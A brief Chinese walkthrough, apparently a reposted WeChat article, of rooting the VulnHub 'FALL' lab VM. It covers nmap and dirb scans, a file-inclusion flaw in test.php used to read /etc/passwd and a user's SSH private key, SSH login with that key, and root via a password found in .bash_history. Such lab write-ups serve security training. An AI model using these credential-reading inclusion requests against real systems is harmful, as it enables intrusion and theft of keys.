今天实践的是vulnhub的FALL镜像,玩儿vulnhub以来最简单的一个,
下载地址,https://download.vulnhub.com/digitalworld/FALL.7z,
用workstation导入成功,直接能看到IP地址,省的做地址扫描了,
直接做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.128,
虽然看到一堆服务,但是最直接的还是通常先浏览器访问http服务,
发现了个账户,qiu,
继续做目录文件爆破,
sudo dirb http://192.168.58.128 -X .php,.html,.txt,
浏览器访问http://192.168.58.128/test.php,
通过报错信息推测这里有文件包含漏洞,
验证一下,http://192.168.58.128/test.php?file=/etc/passwd,
通过/home/qiu信息,确认qiu是系统用户,
猜测其home下有私钥文件,试试,
http://192.168.58.128/test.php?file=/home/qiu/.ssh/id_rsa,
把私钥内容拷贝到kali攻击机本地的文件中,vim sshkey,
注意需要手动调整格式,还要给权限,chmod 600 sshkey,
ssh登录,ssh -i sshkey [email protected],
id看一下不是root,需要提权,
ls -la看到有个.bash_history文件,
查看一下发现了qiu的密码remarkablyawesomE,
直接切root,sudo su root,竟然成功了,id确认一下,是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之FALL的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论